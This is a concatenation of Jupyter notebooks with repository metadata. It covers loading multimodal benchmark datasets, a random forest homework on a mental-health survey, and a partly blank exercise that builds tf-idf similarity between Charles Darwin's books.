http://storage.googleapis.com/download.tensorflow.org/data/petfinder-mini.zip\n1671168/1668792 [==============================] - 0s 0us/step\n1679360/1668792 [==============================] - 0s 0us/step\n" ] ], [ [ "## dataset3 (tab+txt)\n\nRef: https://github.com/sxjscience/automl_multimodal_benchmark", "_____no_output_____" ] ], [ [ "from pathlib import Path\nimport os\ndata_path = Path('../multimodal_text_benchmark/') #/drive/My Drive\nos.chdir(data_path)\n\n#dbck\n!pwd", "/content/drive/MyDrive/multimodal_text_benchmark\n" ], [ "# Install the benchmarking suite\n!pip install -U -e .", "Obtaining file:///content/drive/MyDrive/multimodal_text_benchmark\nRequirement already satisfied: absl-py in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (1.0.0)\nCollecting boto3\n Downloading boto3-1.21.28-py3-none-any.whl (132 kB)\n\u001b[K |████████████████████████████████| 132 kB 16.5 MB/s \n\u001b[?25hCollecting javalang>=0.13.0\n Downloading javalang-0.13.0-py3-none-any.whl (22 kB)\nRequirement already satisfied: h5py>=2.10.0 in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (3.1.0)\nCollecting yacs>=0.1.8\n Downloading yacs-0.1.8-py3-none-any.whl (14 kB)\nRequirement already satisfied: protobuf in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (3.17.3)\nCollecting unidiff\n Downloading unidiff-0.7.3-py2.py3-none-any.whl (14 kB)\nCollecting sentencepiece\n Downloading sentencepiece-0.1.96-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.2 MB)\n\u001b[K |████████████████████████████████| 1.2 MB 59.2 MB/s \n\u001b[?25hRequirement already satisfied: tqdm in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (4.63.0)\nRequirement already satisfied: xarray in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (0.18.2)\nRequirement already satisfied: regex in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (2019.12.20)\nRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (2.23.0)\nCollecting jsonlines\n Downloading jsonlines-3.0.0-py3-none-any.whl (8.5 kB)\nCollecting contextvars\n Downloading contextvars-2.4.tar.gz (9.6 kB)\nRequirement already satisfied: pyarrow in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (6.0.1)\nRequirement already satisfied: pandas in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (1.3.5)\nCollecting py-cpuinfo\n Downloading py-cpuinfo-8.0.0.tar.gz (99 kB)\n\u001b[K |████████████████████████████████| 99 kB 11.6 MB/s \n\u001b[?25hCollecting fasttext!=0.9.2,>=0.9.1\n Downloading fasttext-0.9.1.tar.gz (57 kB)\n\u001b[K |████████████████████████████████| 57 kB 6.2 MB/s \n\u001b[?25hCollecting pybind11>=2.2\n Using cached pybind11-2.9.1-py2.py3-none-any.whl (211 kB)\nRequirement already satisfied: setuptools>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from fasttext!=0.9.2,>=0.9.1->auto-mm-bench==1.0.0.dev20220329) (57.4.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from fasttext!=0.9.2,>=0.9.1->auto-mm-bench==1.0.0.dev20220329) (1.21.5)\nRequirement already satisfied: cached-property in /usr/local/lib/python3.7/dist-packages (from h5py>=2.10.0->auto-mm-bench==1.0.0.dev20220329) (1.5.2)\nRequirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from javalang>=0.13.0->auto-mm-bench==1.0.0.dev20220329) (1.15.0)\nRequirement already satisfied: PyYAML in /usr/local/lib/python3.7/dist-packages (from yacs>=0.1.8->auto-mm-bench==1.0.0.dev20220329) (3.13)\nCollecting s3transfer<0.6.0,>=0.5.0\n Downloading s3transfer-0.5.2-py3-none-any.whl (79 kB)\n\u001b[K |████████████████████████████████| 79 kB 9.3 MB/s \n\u001b[?25hCollecting jmespath<2.0.0,>=0.7.1\n Downloading jmespath-1.0.0-py3-none-any.whl (23 kB)\nCollecting botocore<1.25.0,>=1.24.28\n Downloading botocore-1.24.28-py3-none-any.whl (8.6 MB)\n\u001b[K |████████████████████████████████| 8.6 MB 65.3 MB/s \n\u001b[?25hCollecting urllib3<1.27,>=1.25.4\n Downloading urllib3-1.26.9-py2.py3-none-any.whl (138 kB)\n\u001b[K |████████████████████████████████| 138 kB 74.9 MB/s \n\u001b[?25hRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.7/dist-packages (from botocore<1.25.0,>=1.24.28->boto3->auto-mm-bench==1.0.0.dev20220329) (2.8.2)\nCollecting immutables>=0.9\n Downloading immutables-0.17-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl (116 kB)\n\u001b[K |████████████████████████████████| 116 kB 68.4 MB/s \n\u001b[?25hRequirement already satisfied: typing-extensions>=3.7.4.3 in /usr/local/lib/python3.7/dist-packages (from immutables>=0.9->contextvars->auto-mm-bench==1.0.0.dev20220329) (3.10.0.2)\nRequirement already satisfied: attrs>=19.2.0 in /usr/local/lib/python3.7/dist-packages (from jsonlines->auto-mm-bench==1.0.0.dev20220329) (21.4.0)\nRequirement already satisfied: pytz>=2017.3 in /usr/local/lib/python3.7/dist-packages (from pandas->auto-mm-bench==1.0.0.dev20220329) (2018.9)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (2.10)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (2021.10.8)\nCollecting urllib3<1.27,>=1.25.4\n Downloading urllib3-1.25.11-py2.py3-none-any.whl (127 kB)\n\u001b[K |████████████████████████████████| 127 kB 77.8 MB/s \n\u001b[?25hBuilding wheels for collected packages: fasttext, contextvars, py-cpuinfo\n Building wheel for fasttext (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for fasttext: filename=fasttext-0.9.1-cp37-cp37m-linux_x86_64.whl size=2497842 sha256=e1bcc3031860c8602d683f0d7e0860e57de703194ac43c2fb98306eb3ba414dc\n Stored in directory: /root/.cache/pip/wheels/b2/5b/4b/9c582c778bb93aaad8fc855d5e79f49eae34f59e363a22c422\n Building wheel for contextvars (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for contextvars: filename=contextvars-2.4-py3-none-any.whl size=7681 sha256=efc84482115aab5616c1b05f410b427dd8263a84f4f3565bd497c17323e4ff1c\n Stored in directory: /root/.cache/pip/wheels/0a/11/79/e70e668095c0bb1f94718af672ef2d35ee7a023fee56ef54d9\n Building wheel for py-cpuinfo (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for py-cpuinfo: filename=py_cpuinfo-8.0.0-py3-none-any.whl size=22257 sha256=437c7b02bc61ce35f6ce8b824ed8e32a5542d970b791ec34c94c563952c17934\n Stored in directory: /root/.cache/pip/wheels/d2/f1/1f/041add21dc9c4220157f1bd2bd6afe1f1a49524c3396b94401\nSuccessfully built fasttext contextvars py-cpuinfo\nInstalling collected packages: urllib3, jmespath, botocore, s3transfer, pybind11, immutables, yacs, unidiff, sentencepiece, py-cpuinfo, jsonlines, javalang, fasttext, contextvars, boto3, auto-mm-bench\n Attempting uninstall: urllib3\n Found existing installation: urllib3 1.24.3\n Uninstalling urllib3-1.24.3:\n Successfully uninstalled urllib3-1.24.3\n Running setup.py develop for auto-mm-bench\n\u001b[31mERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.\ndatascience 0.10.6 requires folium==0.2.1, but you have folium 0.8.3 which is incompatible.\u001b[0m\nSuccessfully installed auto-mm-bench-1.0.0.dev20220329 boto3-1.21.28 botocore-1.24.28 contextvars-2.4 fasttext-0.9.1 immutables-0.17 javalang-0.13.0 jmespath-1.0.0 jsonlines-3.0.0 py-cpuinfo-8.0.0 pybind11-2.9.1 s3transfer-0.5.2 sentencepiece-0.1.96 unidiff-0.7.3 urllib3-1.25.11 yacs-0.1.8\n" ], [ "# view all available datasets\nfrom auto_mm_bench.datasets import create_dataset, TEXT_BENCHMARK_ALIAS_MAPPING\ndatasets = list(TEXT_BENCHMARK_ALIAS_MAPPING.values())\nprint(f'-----all available datasets = {datasets}')\n\n# select a dataset\ndataset_name = datasets[-2]\nprint(f'=====selected dataset_name={dataset_name}')\nfrom auto_mm_bench.datasets import dataset_registry\ntrain_dataset = dataset_registry.create(dataset_name, 'train')\ntest_dataset = dataset_registry.create(dataset_name, 'test')", "-----all available datasets = ['product_sentiment_machine_hack', 'melbourne_airbnb', 'news_channel', 'wine_reviews', 'imdb_genre_prediction', 'jigsaw_unintended_bias100K', 'fake_job_postings2', 'kick_starter_funding', 'ae_price_prediction', 'google_qa_answer_type_reason_explanation', 'google_qa_question_type_reason_explanation', 'women_clothing_review', 'mercari_price_suggestion100K', 'jc_penney_products', 'news_popularity2', 'bookprice_prediction', 'data_scientist_salary', 'california_house_price']\n=====selected dataset_name=data_scientist_salary\n" ], [ "df = train_dataset.data.head(nrows)\ndf_test = test_dataset.data.head(nrows)\ndf.tail()", "_____no_output_____" ], [ "#define global variables: df, x_cols, label_col, num_classes\nx_cols = train_dataset.feature_columns\nlabel_col = train_dataset.label_columns[0]\nx_cols, label_col", "_____no_output_____" ], [ "\n#save a copy\ndf.to_csv(data_path+'df_salary.csv')\ntest_df.to_csv(data_path+'test_df_salary.csv')", "_____no_output_____" ] ], [ [ "## dataset4 (tab, txt) skippable meeting", "_____no_output_____" ] ], [ [ "df = pd.read_csv(data_path+'iu_2022_101_325.csv', index_col=0)\nlabel_col = 'response_status'\ndf.tail()\n", "_____no_output_____" ], [ "list(df.columns)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72f32e173bcaed803bf6db09e3b2a525f97b461
23,929
ipynb
Jupyter Notebook
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
38.78282
351
0.429813
[ [ [ "import pandas\n\ndataframe = pandas.read_csv('mental-heath-in-tech-2016_20161114.csv')\n\n#firstly fill all missing with -1, and treat these fields in the later part if needed\ndataframe = dataframe.fillna(-1)\n\ncolumn_keep = [\"Is your employer primarily a tech company/organization?\",\"What is your age?\",\"Have you ever sought treatment for a mental health issue from a mental health professional?\",\"Have you been diagnosed with a mental health condition by a medical professional?\",\"Do you have previous employers?\",\"Are you self-employed?\"]\nclean_DF = dataframe[column_keep].copy()\nclean_DF.rename(columns = {'What is your age?':'age',\n 'Have you ever sought treatment for a mental health issue from a mental health professional?':'sought',\n 'Have you been diagnosed with a mental health condition by a medical professional?':'diagnosed',\n 'Do you have previous employers?':'previous-employer',\n 'Are you self-employed?':'self-employeed',\n 'Is your employer primarily a tech company/organization?':'tech-company'}, inplace = True)\nclean_DF['diagnosed'] = clean_DF['diagnosed'].map({'Yes':1,'No':0})\nclean_DF['tech-company'] = clean_DF['tech-company'].map({1:1}).fillna(0)\nclean_DF['have-disorder'] = dataframe['Do you currently have a mental health disorder?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0)\nclean_DF['have-disorder-past'] = dataframe['Have you had a mental health disorder in the past?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0)\nclean_DF['remote']=dataframe['Do you work remotely?'].map({'Always':2,'Sometimes':1,'Never':0})\nclean_DF['gender']=dataframe['What is your gender?'].str.lower().map({\"male\":1,\"m\":1,\"f\":2,\"female\":2}).fillna(0)\nclean_DF['company-scale'] = dataframe['How many employees does your company or organization have?'].map({\"1-5\":1,\"6-25\":2,\"26-100\":3,\"100-500\":4,\"500-1000\":5,\"More than 1000\":6}).fillna(0)\nclean_DF['is_anxiety_disorder'] = dataframe['If yes, what condition(s) have you been diagnosed with?'].str.contains('Anxiety', regex=False).map({True:1}).fillna(0)\nclean_DF['is_mood_disorder'] = dataframe['If yes, what condition(s) have you been diagnosed with?'].str.contains('Mood', regex=False).map({True:1}).fillna(0)\n\n\n# merge attitude toward mental illness( these two will be the same progress as merge to mental health)\nclean_DF['attitude']=dataframe['Would you bring up a mental health issue with a potential employer in an interview?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Do you feel that being identified as a person with a mental health issue would hurt your career?'].map({\"No, I don't think it would\":2,\"Yes, I think it would\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Do you think that team members/co-workers would view you more negatively if they knew you suffered from a mental health issue?'].map({\"No, they do not\":2,\"Yes, I think they would\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['How willing would you be to share with friends and family that you have a mental illness?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Have you observed or experienced an unsupportive or badly handled response to a mental health issue in your current or previous workplace?'].str.contains('Yes', regex=False).map({True:1}).fillna(0) + \\\ndataframe['Have your observations of how another individual who discussed a mental health disorder made you less likely to reveal a mental health issue yourself in your current workplace?'].str.contains('Yes', regex=False).map({True:1}).fillna(0)\n# merge previous access to mental health( these two will be the same progress as merge to mental health)\nclean_DF['previous_access']= dataframe['Was your anonymity protected if you chose to take advantage of mental health or substance abuse treatment resources with previous employers?'].str.contains('Yes', regex=False).map({True:1}).fillna(0)\n\n# merge access to mental health\nclean_DF['access']= dataframe['Does your employer provide mental health benefits as part of healthcare coverage?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Do you know the options for mental health care available under your employer-provided coverage?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Has your employer ever formally discussed mental health (for example, as part of a wellness campaign or other official communication)?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Does your employer offer resources to learn more about mental health concerns and options for seeking help?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Is your anonymity protected if you choose to take advantage of mental health or substance abuse treatment resources provided by your employer?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['If a mental health issue prompted you to request a medical leave from work, asking for that leave would be:'].map({\"Very easy\":5,\"Somewhat easy\":4,\"Neither easy nor difficult\":3,\"Somewhat difficult\":2,\"Very difficult\":1}).fillna(1) + \\\ndataframe['Do you think that discussing a mental health disorder with your employer would have negative consequences?'].map({\"Yes\":0}).fillna(1) + \\\ndataframe['Do you think that discussing a physical health issue with your employer would have negative consequences?'].map({\"Yes\":0}).fillna(1) + \\\ndataframe['Would you feel comfortable discussing a mental health disorder with your coworkers?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Would you feel comfortable discussing a mental health disorder with your direct supervisor(s)?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Do you feel that your employer takes mental health as seriously as physical health?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Have you heard of or observed negative consequences for co-workers who have been open about mental health issues in your workplace?'].map({\"Yes\":0}).fillna(1)\n\nclean_DF\n\n\n", "_____no_output_____" ], [ "from sklearn.model_selection import train_test_split\n\ntarget = 'have-disorder'\nX = clean_DF.drop(labels = [target], axis='columns').copy()\ny = clean_DF[target]\nX_train, X_rem, y_train, y_rem = train_test_split(X,y, train_size=0.8)\n# split validate set and test set\nX_valid, X_test, y_valid, y_test = train_test_split(X_rem,y_rem, test_size=0.5)", "_____no_output_____" ] ], [ [ "1. Correctly splitting the dataset into train, validate, and holdout", "_____no_output_____" ] ], [ [ "# Import the model we are using\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\nbaseline_classifier_model = RandomForestClassifier()\n# Train the baseline model on training data\nbaseline_classifier_model = baseline_classifier_model.fit(X_train, y_train)", "_____no_output_____" ] ], [ [ "2. Correctly training your model on the training dataset", "_____no_output_____" ] ], [ [ "# Use the forest's predict method on the holdout\npredictions = baseline_classifier_model.predict(X_valid)\n# Calculate the accuracy_score\naccuracy_score(predictions, y_valid)", "_____no_output_____" ] ], [ [ "3. Correctly scoring your model on the validation dataset", "_____no_output_____" ] ], [ [ "# Use the forest's predict method on the holdout\npredictions = baseline_classifier_model.predict(X_test)\n# Calculate the accuracy_score\naccuracy_score(predictions, y_test)", "_____no_output_____" ] ], [ [ "4. Correctly explaining if your model overfit or not (or state it is impossible to tell and why)\n\n- As the validation set and test set both yielded similar results, it does not appear that the model is overfitted. This is because it doesn't perform any worse when tested on data that it has not yet seen, so it has not “memorized” the inputs.", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import GridSearchCV\n\nrfc=RandomForestClassifier(random_state=42)\nparam_grid = { \n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt', 'log2'],\n 'max_depth' : [4,6,8],\n 'criterion' :['gini', 'entropy'],\n 'min_samples_split':[2,4]\n}\nCV_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv= 5)\nCV_rfc.fit(X_train, y_train)", "_____no_output_____" ] ], [ [ "5. Tune at least five parameters using GridSearchCV, with 2-4 values for each parameter", "_____no_output_____" ] ], [ [ "CV_rfc.best_params_", "_____no_output_____" ], [ "rfc1 = RandomForestClassifier(random_state=42, max_features='auto', n_estimators= 500, max_depth=6, min_samples_split=2, criterion='entropy')\nrfc1.fit(X_train, y_train)\npred=rfc1.predict(X_valid)\naccuracy_score(pred, y_valid)", "_____no_output_____" ] ], [ [ "6. Report results if the hyperparamater tuning helped model performance.\n\nWe do have a 2% improvement on model performance", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e72f37f298238f33b402a688953d23a955e3cdae
17,269
ipynb
Jupyter Notebook
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
1
2022-03-23T18:24:11.000Z
2022-03-23T18:24:11.000Z
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
null
null
null
notebook.ipynb
MLVPRASAD/Book-Recommendations-from-Charles-Darwin
6184b494defdffe33531f039d25a61961f565b86
[ "MIT" ]
null
null
null
17,269
17,269
0.729168
[ [ [ "## 1. Darwin's bibliography\n<p><img src=\"https://assets.datacamp.com/production/project_607/img/CharlesDarwin.jpg\" alt=\"Charles Darwin\" width=\"300px\"></p>\n<p>Charles Darwin is one of the few universal figures of science. His most renowned work is without a doubt his \"<em>On the Origin of Species</em>\" published in 1859 which introduced the concept of natural selection. But Darwin wrote many other books on a wide range of topics, including geology, plants or his personal life. In this notebook, we will automatically detect how closely related his books are to each other.</p>\n<p>To this purpose, we will develop the bases of <strong>a content-based book recommendation system</strong>, which will determine which books are close to each other based on how similar the discussed topics are. The methods we will use are commonly used in text- or documents-heavy industries such as legal, tech or customer support to perform some common task such as text classification or handling search engine queries.</p>\n<p>Let's take a look at the books we'll use in our recommendation system.</p>", "_____no_output_____" ] ], [ [ "# Import library\nimport glob\n\n# The books files are contained in this folder\nfolder = \"datasets/\"\n\n# List all the .txt files and sort them alphabetically\nfiles = glob.glob(folder+'*.txt')\n# ... YOUR CODE FOR TASK 1 ...\nfiles.sort()", "_____no_output_____" ] ], [ [ "## 2. Load the contents of each book into Python\n<p>As a first step, we need to load the content of these books into Python and do some basic pre-processing to facilitate the downstream analyses. We call such a collection of texts <strong>a corpus</strong>. We will also store the titles for these books for future reference and print their respective length to get a gauge for their contents.</p>", "_____no_output_____" ] ], [ [ "# Import libraries\nimport re, os\n\n# Initialize the object that will contain the texts and titles\ntxts = []\ntitles = []\n\nfor n in files:\n # Open each file\n f = open(n, encoding='utf-8-sig')\n # Remove all non-alpha-numeric characters\n data = re.sub('[\\W_]+', ' ', f.read())\n # ... YOUR CODE FOR TASK 2 ...\n # Store the texts and titles of the books in two separate lists\n \n txts.append(data)\n titles.append(os.path.basename(n).replace(\".txt\", \"\"))\n\n# Print the length, in characters, of each book\n[len(t) for t in txts]", "_____no_output_____" ] ], [ [ "## 3. Find \"On the Origin of Species\"\n<p>For the next parts of this analysis, we will often check the results returned by our method for a given book. For consistency, we will refer to Darwin's most famous book: \"<em>On the Origin of Species</em>.\" Let's find to which index this book is associated.</p>", "_____no_output_____" ] ], [ [ "# Browse the list containing all the titles\nfor i in range(len(titles)):\n # Store the index if the title is \"OriginofSpecies\"\n # ... YOUR CODE FOR TASK 3 ...\n if titles[i] == 'OriginofSpecies':\n ori = i\n break\nori\n# Print the stored index\n# ... YOUR CODE FOR TASK 3 ...", "_____no_output_____" ] ], [ [ "## 4. Tokenize the corpus\n<p>As a next step, we need to transform the corpus into a format that is easier to deal with for the downstream analyses. We will tokenize our corpus, i.e., transform each text into a list of the individual words (called tokens) it is made of. To check the output of our process, we will print the first 20 tokens of \"<em>On the Origin of Species</em>\".</p>", "_____no_output_____" ] ], [ [ "# Define a list of stop words\nstoplist = set('for a of the and to in to be which some is at that we i who whom show via may my our might as well'.split())\n\n# Convert the text to lower case \n\ntxts_lower_case = [txt.lower() for txt in txts]\n\n# Transform the text into tokens \ntxts_split = [txt.split() for txt in txts_lower_case]\n\n# Remove tokens which are part of the list of stop words\ntexts = [[word for word in txt if word not in stoplist] for txt in txts_split]\n\n# Print the first 20 tokens for the \"On the Origin of Species\" book\ntexts[ori][: 20]", "_____no_output_____" ] ], [ [ "## 5. Stemming of the tokenized corpus\n<p>If you have read <em>On the Origin of Species</em>, you will have noticed that Charles Darwin can use different words to refer to a similar concept. For example, the concept of selection can be described by words such as <em>selection</em>, <em>selective</em>, <em>select</em> or <em>selects</em>. This will dilute the weight given to this concept in the book and potentially bias the results of the analysis.</p>\n<p>To solve this issue, it is a common practice to use a <strong>stemming process</strong>, which will group together the inflected forms of a word so they can be analysed as a single item: <strong>the stem</strong>. In our <em>On the Origin of Species</em> example, the words related to the concept of selection would be gathered under the <em>select</em> stem.</p>\n<p>As we are analysing 20 full books, the stemming algorithm can take several minutes to run and, in order to make the process faster, we will directly load the final results from a pickle file and review the method used to generate it.</p>", "_____no_output_____" ] ], [ [ "import pickle\n\ntexts_stem = pickle.load(open('datasets/texts_stem.p', 'rb'))\n\n# Print the 20 first stemmed tokens from the \"On the Origin of Species\" book\ntexts_stem[ori][: 20]", "_____no_output_____" ] ], [ [ "## 6. Building a bag-of-words model\n<p>Now that we have transformed the texts into stemmed tokens, we need to build models that will be useable by downstream algorithms.</p>\n<p>First, we need to will create a universe of all words contained in our corpus of Charles Darwin's books, which we call <em>a dictionary</em>. Then, using the stemmed tokens and the dictionary, we will create <strong>bag-of-words models</strong> (BoW) of each of our texts. The BoW models will represent our books as a list of all uniques tokens they contain associated with their respective number of occurrences. </p>\n<p>To better understand the structure of such a model, we will print the five first elements of one of the \"<em>On the Origin of Species</em>\" BoW model.</p>", "_____no_output_____" ] ], [ [ "\nfrom gensim import corpora\n\n# Create a dictionary from the stemmed tokens\ndictionary = corpora.Dictionary(texts_stem)\n\n# Create a bag-of-words model for each book, using the previously generated dictionary\nbows = [dictionary.doc2bow(txt) for txt in texts_stem]\n\n# Print the first five elements of the On the Origin of species' BoW model\nbows[ori][: 5]", "_____no_output_____" ] ], [ [ "## 7. The most common words of a given book\n<p>The results returned by the bag-of-words model is certainly easy to use for a computer but hard to interpret for a human. It is not straightforward to understand which stemmed tokens are present in a given book from Charles Darwin, and how many occurrences we can find.</p>\n<p>In order to better understand how the model has been generated and visualize its content, we will transform it into a DataFrame and display the 10 most common stems for the book \"<em>On the Origin of Species</em>\".</p>", "_____no_output_____" ] ], [ [ "import pandas as pd\n\n# Convert the BoW model for \"On the Origin of Species\" into a DataFrame\ndf_bow_origin = pd.DataFrame(bows[ori])\n# Add the column names to the DataFrame\ndf_bow_origin.columns = ['index', 'occurrences']\n\n# Add a column containing the token corresponding to the dictionary index\ndf_bow_origin['token'] = df_bow_origin['index'].apply(lambda x: dictionary[x])\n\n# Sort the DataFrame by descending number of occurrences and print the first 10 values\ndf_bow_origin = df_bow_origin.sort_values('occurrences', ascending=False)\ndf_bow_origin.head(10)", "_____no_output_____" ] ], [ [ "## 8. Build a tf-idf model\n<p>If it wasn't for the presence of the stem \"<em>speci</em>\", we would have a hard time to guess this BoW model comes from the <em>On the Origin of Species</em> book. The most recurring words are, apart from few exceptions, very common and unlikely to carry any information peculiar to the given book. We need to use an additional step in order to determine which tokens are the most specific to a book.</p>\n<p>To do so, we will use a <strong>tf-idf model</strong> (term frequency–inverse document frequency). This model defines the importance of each word depending on how frequent it is in this text and how infrequent it is in all the other documents. As a result, a high tf-idf score for a word will indicate that this word is specific to this text.</p>\n<p>After computing those scores, we will print the 10 words most specific to the \"<em>On the Origin of Species</em>\" book (i.e., the 10 words with the highest tf-idf score).</p>", "_____no_output_____" ] ], [ [ "# Load the gensim functions that will allow us to generate tf-idf models\nfrom gensim.models import TfidfModel\n\n# Generate the tf-idf model\nmodel = TfidfModel(bows)\n\n# Print the model for \"On the Origin of Species\"\nmodel[bows[ori]]", "_____no_output_____" ] ], [ [ "## 9. The results of the tf-idf model\n<p>Once again, the format of those results is hard to interpret for a human. Therefore, we will transform it into a more readable version and display the 10 most specific words for the \"<em>On the Origin of Species</em>\" book.</p>", "_____no_output_____" ] ], [ [ "# Convert the tf-idf model for \"On the Origin of Species\" into a DataFrame\ndf_tfidf = ...\n\n# Name the columns of the DataFrame id and score\n# ... YOUR CODE FOR TASK 9 ...\n\n# Add the tokens corresponding to the numerical indices for better readability\n# ... YOUR CODE FOR TASK 9 ...\n\n# Sort the DataFrame by descending tf-idf score and print the first 10 rows.\n# ... YOUR CODE FOR TASK 9 ...", "_____no_output_____" ] ], [ [ "## 10. Compute distance between texts\n<p>The results of the tf-idf algorithm now return stemmed tokens which are specific to each book. We can, for example, see that topics such as selection, breeding or domestication are defining \"<em>On the Origin of Species</em>\" (and yes, in this book, Charles Darwin talks quite a lot about pigeons too). Now that we have a model associating tokens to how specific they are to each book, we can measure how related to books are between each other.</p>\n<p>To this purpose, we will use a measure of similarity called <strong>cosine similarity</strong> and we will visualize the results as a distance matrix, i.e., a matrix showing all pairwise distances between Darwin's books.</p>", "_____no_output_____" ] ], [ [ "# Load the library allowing similarity computations\nfrom gensim import similarities\n\n# Compute the similarity matrix (pairwise distance between all texts)\nsims = ...\n\n# Transform the resulting list into a dataframe\nsim_df = ...\n\n# Add the titles of the books as columns and index of the dataframe\n# ... YOUR CODE FOR TASK 10 ...\n\n# Print the resulting matrix\n# ... YOUR CODE FOR TASK 10 ...", "_____no_output_____" ] ], [ [ "## 11. The book most similar to \"On the Origin of Species\"\n<p>We now have a matrix containing all the similarity measures between any pair of books from Charles Darwin! We can now use this matrix to quickly extract the information we need, i.e., the distance between one book and one or several others. </p>\n<p>As a first step, we will display which books are the most similar to \"<em>On the Origin of Species</em>,\" more specifically we will produce a bar chart showing all books ranked by how similar they are to Darwin's 